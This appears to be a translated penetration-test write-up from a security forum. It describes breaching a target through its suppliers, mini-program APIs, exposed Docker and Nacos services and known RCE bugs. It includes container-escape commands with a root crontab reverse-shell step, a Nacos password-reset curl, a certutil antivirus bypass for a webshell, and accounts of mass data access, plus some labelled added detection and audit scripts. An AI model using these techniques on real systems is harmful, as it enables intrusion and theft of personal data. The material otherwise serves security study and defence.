Title: A case of a breakthrough in the external network

1. Supply Chain

After years of offensive and defensive confrontation, a large number of target units have gradually realized the importance of security protection. They have therefore reduced asset exposure as much as possible and deployed a wide range of security devices. However, security protection depends on completeness and suffers from a clear weakest-link effect: once a weak point appears, the entire protection system can collapse instantly. The target unit's supply chain is often where these weaknesses concentrate. Suppliers are not only exposed, but their complex relationships with the target also make them harder to monitor and manage. Attack teams therefore usually start from the supply chain, bypass the target unit's strong defenses by a roundabout route, and gain control of the target unit.

Search for '<system name>' together with the target unit's name on a search engine.

Find the relevant supplier information, then obtain the target unit's data and permissions by attacking the supplier.

1.1. heapdump leak

While penetrating the supplier's assets, a leaked heapdump file was found in the admin directory of one asset.

I won't go into details about exploiting the heapdump here; many articles have researched its principles and exploitation in depth, and under specific circumstances RCE can be achieved directly. A large amount of sensitive information was leaked here, and the password information was added to the password book.

Logging in to MinIO revealed a large amount of sensitive information about the target unit, as well as sensitive information about other units.

Logging in to Nacos revealed a large number of configuration files; the password information was added to the password book.

Logging in to OSS revealed a large amount of sensitive information about the target unit.

1.2. Unauthorized WeChat mini program interface

1.2.1. Unpacking the WeChat mini program

To unpack a WeChat mini program, the first step is to obtain the target mini program's wxapkg file. The wxapkg file is the package format of WeChat mini programs: it bundles the program's code, resources and other required files into a single file. On Windows, however, the JS code and resource files inside the wxapkg file are generally encrypted, so a dedicated decryption tool is needed to decrypt the file before it can be unpacked and its contents read. On iOS and Android the file can be unpacked directly.

1.2.1.1. Get the wxapkg file

When obtaining the wxapkg file, it is best to delete the files in the folder first and then reopen the mini program, so that other files do not interfere.

The iOS wxapkg storage path is:

/var/mobile/Containers/Data/Application/{System UUID}/Library/WechatPrivate/{user hash value}/WeApp/LocalCache/release/{AppID of applet}

The Android wxapkg storage path is:

/data/data/com.tencent.mm/MicroMsg/{user hash value}/appbrand/pkg/

The Windows wxapkg storage path is:

C:\Users\{System Username}\Documents\WeChat Files\Applet\{AppID of applet}\

1.2.1.2. Decryption

The following two GitHub projects perform the decryption:

https://github.com/superdashu/pc_wxapkg_decrypt_python

https://github.com/BlackTrace/pc_wxapkg_decrypt

Decryption principle (shown in the original screenshot).

Decryption succeeded.

1.2.1.3. Unpacking

Tool download link provided by Guoguang:

https://sqlsec.lanzoub.com/i1NEP0mx694f

node wuWxapkg.js 1.wxapkg

Unpack the mini program, obtain the front-end JS code, and extract the interface (API) endpoints from it.

The target interface can be accessed directly, although the front-end page shows an initialization failure.

The data is nevertheless returned in the traffic, and nearly 10 million sensitive records of the target unit were found.

1.3. Web application broken access control

Using the passwords collected above, one password hit yielded an account, but this account had minimal privileges and no operation permissions. Clicking to search the organizational structure returned no information at this point.

Capture the request, remove the parentId and orgLevel parameters, and resend it: the organizational structure of all employees is returned without any permission check.

Click to modify the password, and add the roleId obtained above to the request to obtain all permissions.

A large amount of data was obtained.

1.4. Official account

A password leaked in JS could be used to log in to the target unit's official account.

2. Cloud native security

Containerized deployment and microservice architectures give application development and deployment better flexibility, scalability, maintainability and performance, and are adopted by more and more vendors. New application forms introduce new attack surfaces, such as container escape, inter-service attacks and API abuse, which attackers can exploit to reach applications and data. Managing the authentication and authorization of users and services also becomes more complex in a cloud-native environment. Many application developers overlook security or treat it as secondary while pursuing the convenience and efficiency of containerized and cloud-native architectures, which directly makes the cloud-native environment fragile and vulnerable to a variety of security threats and attacks.

2.1. Harbor image registry

Harbor is an open source container image registry designed to help organizations store, manage and distribute Docker container images, but Harbor has a controversial "vulnerability": any user can directly obtain public images.

The image files can be pulled and downloaded directly, and scripts can be used to download them in batches.

2.2. Suspected backdoor

Obtain the jar package from the image file, extract sensitive information such as configuration files, decompile the jar's class files, and audit the code. This revealed a backdoor-like vulnerability: the interface only needs a username to log in to the system backend. With the resulting administrator permissions, combined with file upload, server permissions were obtained.

Connect to the database and other services through the configuration files.

2.3. Docker unauthorized access

2.3.1. Registry API unauthorized access

In the Docker Registry API, authentication and authorization are usually based on an access token or a username and password. If access control is not configured correctly, unauthorized access results, and an attacker can pull every image in the registry.

Visit the /v2/_catalog interface to list all repositories.

https://github.com/Soufaker/docker_v2_catalog

Use the above tool to download the images directly.

2.3.2. Docker Remote API unauthorized access

In order to manage container clusters, Docker allows the Docker Daemon to run as a background process and execute Docker commands sent through its management interface. When the Docker Daemon is started with the parameter -H 0.0.0.0:2375, port 2375 is opened to receive commands from remote Docker clients. In this case port 2375 is exposed unencrypted and without any form of authentication, so an attacker can connect directly to the Docker Daemon with the docker command, operate on the containers, and achieve container escape by mounting the host's root directory.

```shell
# View containers
docker -H tcp://target:2375 ps -a

# Mount the host's root directory to the /mnt directory in the container
docker -H tcp://target:2375 run -it -v /:/mnt nginx:latest /bin/bash

# Reverse shell: write to the host's root crontab through the mount
echo '<reverse shell command>' > /mnt/var/spool/cron/crontabs/root
```
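As an added defensive check that is not part of the original write-up, the following Python function inspects a dockerd command line (such as the ExecStart of docker.service) and the contents of daemon.json for the unauthenticated tcp://0.0.0.0:2375 listener described above; the sample inputs are constructed.

```python
"""Check a Docker daemon's listen configuration for the unauthenticated
tcp://0.0.0.0:2375 exposure described in section 2.3.2. Added example, not
from the original write-up: it reads the dockerd command line (ExecStart of
docker.service) and /etc/docker/daemon.json; sample inputs are constructed."""
import json
import re
import shlex
from typing import List

_TCP_HOST = re.compile(r"^tcp://(?P<host>.*?)(?::(?P<port>\d+))?$")

def _hosts_from_cmdline(cmdline: str) -> List[str]:
    """Collect every value given to -H / --host on a dockerd command line."""
    args = shlex.split(cmdline)
    hosts, i = [], 0
    while i < len(args):
        if args[i] in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        m = re.match(r"^(?:-H|--host)=(.+)$", args[i])
        if m:
            hosts.append(m.group(1))
        i += 1
    return hosts

def find_exposed_tcp(cmdline: str, daemon_json_text: str = "{}") -> List[str]:
    """Return one finding per TCP listener that lacks TLS client authentication.

    A tcp:// host bound to 0.0.0.0 or [::] is reachable from the network;
    without --tlsverify anyone who can reach it fully controls the daemon
    and, through a -v /:/mnt bind mount, the host itself."""
    cfg = json.loads(daemon_json_text)
    hosts = _hosts_from_cmdline(cmdline) + list(cfg.get("hosts", []))
    tls = "--tlsverify" in shlex.split(cmdline) or bool(cfg.get("tlsverify"))
    findings = []
    for h in hosts:
        m = _TCP_HOST.match(h)
        if not m or tls:
            continue  # unix:// and fd:// are local-only; TLS-verified listeners are fine
        host = m.group("host") or "localhost"  # dockerd binds localhost when the host is omitted
        port = m.group("port") or "2375"       # dockerd's default plaintext port
        if host in ("0.0.0.0", "[::]", "::"):
            findings.append(f"{h}: unauthenticated Docker API on all interfaces, port {port}")
        else:
            findings.append(f"{h}: plaintext Docker API without tlsverify")
    return findings
```

Run it against `systemctl cat docker` output and daemon.json on each host; any "all interfaces" finding should be closed by binding to a unix socket or enabling TLS client certificates.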

2.4. Nacos

Nacos is an open source platform for dynamic service discovery, configuration management and service management. It provides a registry center, a configuration center and service management functions, helping developers implement service registration, configuration management and service discovery in a microservice architecture.

As an open source tool, it has had many vulnerabilities disclosed:

Unauthorized access: GET /nacos/v1/auth/users?pageNo=1&pageSize=1 lists users directly.

Add an arbitrary user: POST /nacos/v1/auth/users with the body username=<name>&password=<password>

Modify any user's password:

```shell
curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent:Nacos-Server' -d 'username=test1&newPassword=test2'
```

Weak password: nacos/nacos
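As an added example that is not part of the original write-up, the following Python detection logic flags the requests from sections 2.3.1 and 2.4 (the Docker Registry /v2/_catalog listing, the Nacos user API, and the User-Agent: Nacos-Server bypass header) in constructed nginx-format access log lines; the CLUSTER_NODES allow-list is an assumption to be filled with your own Nacos node addresses.

```python
"""Flag the admin-API requests of sections 2.3.1 and 2.4 in access logs: Docker
Registry catalog listing, the Nacos user API and the User-Agent: Nacos-Server
header that bypasses Nacos authentication. Added example, not from the original
write-up; log lines are constructed samples in nginx "combined" format."""
import re
from typing import Dict, List

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Assumption: your own Nacos cluster nodes, which legitimately send the Nacos-Server
# User-Agent to each other; anyone else presenting it is impersonating a server.
CLUSTER_NODES = {"10.0.0.11", "10.0.0.12"}

def parse_line(line: str) -> Dict[str, str]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}

def classify(rec: Dict[str, str]) -> str:
    """Return an alert name for one parsed request, or '' if nothing matched."""
    if not rec:
        return ""
    path = rec["path"].split("?", 1)[0]
    success = rec["status"].startswith("2")
    if (path.startswith("/nacos/") and rec["ua"].startswith("Nacos-Server")
            and rec["ip"] not in CLUSTER_NODES):
        return "nacos-server-ua-from-outside-cluster"
    if path == "/nacos/v1/auth/users" and success:
        return {"GET": "nacos-user-enumeration", "POST": "nacos-user-created",
                "PUT": "nacos-password-changed"}.get(rec["method"], "nacos-user-api")
    if path == "/v2/_catalog" and success:
        return "registry-catalog-listing"
    return ""

def scan(lines: List[str]) -> List[Dict[str, str]]:
    alerts = []
    for line in lines:
        rec = parse_line(line)
        name = classify(rec)
        if name:
            alerts.append({"alert": name, "ip": rec["ip"], "path": rec["path"]})
    return alerts

SAMPLE_LOG = [  # constructed sample lines
    '203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Oct/2023:12:00:05 +0000] "PUT /nacos/v1/auth/users?accessToken= HTTP/1.1" 200 30 "-" "Nacos-Server"',
    '198.51.100.4 - - [10/Oct/2023:12:01:00 +0000] "GET /v2/_catalog HTTP/1.1" 200 210 "-" "python-requests/2.31"',
    '192.0.2.9 - - [10/Oct/2023:12:02:00 +0000] "GET /nacos/index.html HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]
```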

By brute-forcing the backend with the collected passwords, a large number of configuration files were found, but the sensitive information in them was encrypted.

2.4.1. Jasypt encryption

Spring configuration files contain sensitive information such as database passwords, so it is often desirable to encrypt it. Jasypt is a convenient tool for this: a Java library that simplifies the encryption and decryption of sensitive data (passwords, API keys and so on).

Encrypted values are wrapped in ENC(...), and the encryption password is specified by jasypt.encryptor.password:

```yaml
spring:
  datasource:
    username: your-username
    password: ENC(encrypted-password)
```

Because the application must be able to decrypt the values, the password has to be placed in the configuration file or in the code:

```yaml
# application.yml
jasypt:
  encryptor:
    password: <encryption password>
    algorithm: <encryption algorithm>
```

Decrypt data: use the decrypt method of the decryptor to decrypt the encrypted data.

```java
import org.jasypt.util.text.BasicTextEncryptor;

public class DecryptionExample {
    public static void main(String[] args) {
        String encryptionKey = "yourEncryptionKey"; // encryption key (the jasypt.encryptor.password value)
        // BasicTextEncryptor uses PBEWithMD5AndDES; a different configured
        // algorithm needs StandardPBEStringEncryptor with setAlgorithm instead.
        BasicTextEncryptor textEncryptor = new BasicTextEncryptor();
        textEncryptor.setPassword(encryptionKey);
        String encryptedText = "encryptedText"; // encrypted data, the part inside ENC(...)
        String decryptedText = textEncryptor.decrypt(encryptedText);
        System.out.println("Decrypted Text: " + decryptedText);
    }
}
```

However, the security of client-side encryption depends entirely on the protection and trustworthiness of the client code: once the password leaks, the encryption is useless. If you find a Jasypt-encrypted password in a Nacos configuration file, it can be decrypted directly.
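As an added audit example, not from the original write-up, this Python script flattens exported Spring configuration files (YAML or .properties, as pulled from a Nacos configuration center) and reports whether ENC(...) values and the jasypt.encryptor.password key sit in the same export, which is exactly the condition that made the encryption useless above; file names and contents are constructed.

```python
"""Audit exported Spring configuration (for example the files pulled from a
Nacos configuration centre, section 2.4) for Jasypt ENC(...) values whose
decryption key is stored beside them. Added example, not from the original
write-up; file names and contents are constructed samples."""
import re
from typing import Dict

ENC_RE = re.compile(r"ENC\(([^)]*)\)")
KEY_PROPERTY = "jasypt.encryptor.password"

def flatten(text: str) -> Dict[str, str]:
    """Flatten simple YAML mappings or a .properties file into dotted keys.
    Handles indentation-nested 'key: value' mappings only (no lists/anchors)."""
    out, stack = {}, []  # stack holds (indent, key) for the current YAML path
    for raw in text.splitlines():
        line = re.split(r"\s+#", raw)[0].rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if "=" in line and ":" not in line.split("=", 1)[0]:  # .properties line
            k, v = line.split("=", 1)
            out[k.strip()] = v.strip()
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while stack and stack[-1][0] >= indent:
            stack.pop()
        stack.append((indent, key.strip()))
        if value.strip():
            out[".".join(k for _, k in stack)] = value.strip().strip("'\"")
    return out

def audit(configs: Dict[str, str]) -> Dict[str, object]:
    """Count ENC(...) values per file and locate the decryption key."""
    enc = {n: len(ENC_RE.findall(b)) for n, b in configs.items() if ENC_RE.search(b)}
    keys = {n: flatten(b)[KEY_PROPERTY] for n, b in configs.items()
            if KEY_PROPERTY in flatten(b)}
    return {"encrypted_values": enc, "key_files": sorted(keys),
            # the write-up's situation: ciphertext and key leak together
            "key_colocated": bool(enc) and bool(keys)}

SAMPLE_CONFIGS = {  # constructed samples, as they might be exported from Nacos
    "app-prod.yml": "spring:\n  datasource:\n    username: app\n    password: ENC(Zm9vYmFy)\n",
    "bootstrap.yml": "jasypt:\n  encryptor:\n    password: s3cret-key\n    algorithm: PBEWithMD5AndDES\n",
    "oss.properties": "oss.endpoint=oss-cn.example.com\noss.accessKeySecret=ENC(YmF6cXV4)\n",
}
```

A key_colocated result of True means the key should be moved out of the configuration center (for example into an environment variable or secret store) so that a leak of the exported files no longer yields plaintext.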

Successfully connected to OSS.

Successfully connected to the database.

With the mini program token, the mini program was taken over.

Dameng Database is a Chinese domestic relational database; the following tool can be used to connect to it:

https://github.com/864381832/x-RdbmsSyncTool/releases/tag/v0.0.3

3. Nday

3.1. Yonyou NC jsInvoke RCE vulnerability

Exploitation method: create a javax.naming.InitialContext object through the Java reflection mechanism and connect to the specified IP address and port over the LDAP protocol, then call the 'saveXStreamConfig' method of the 'nc.itf.iufo.IBaseSPService' service, which accepts an object and a string as parameters, achieving command execution.

The command executed successfully, but the target system runs antivirus software, so the file cannot be uploaded directly.

3.1.1. certutil

certutil is a command line tool in the Windows operating system, mainly used for certificate and encryption related operations. Its decode operation can be used to bypass the antivirus.

echo <base64 encoding of myfile.jsp> > <encoded file relative path>

Decode using certutil:

certutil -decode <encoded Trojan relative path> <decoded Trojan relative path>

Behinder (Ice Scorpion) is online and Cobalt Strike is launched.

3.2. If you open it with two

The Shiro vulnerability had been patched, but an unauthenticated information leak vulnerability was found.

Using the obtained username, a weak password gave access to the backend with normal permissions.

Once again, a password guessed from an announcement post gave a successful login to the backend. System management permissions were added, giving the user the highest permissions.

Logging in as the added user, a scheduled task function was found, and commands were executed directly through the scheduled task.

3.3. Shiro

When the target path is accessed, it first redirects to the unified authentication login, so most people overlook that the path has a Shiro deserialization vulnerability.

With a try-anyway mentality, I scanned for Shiro and obtained permissions directly.

Reprinted from the original link: https://forum.butian.net/share/2442
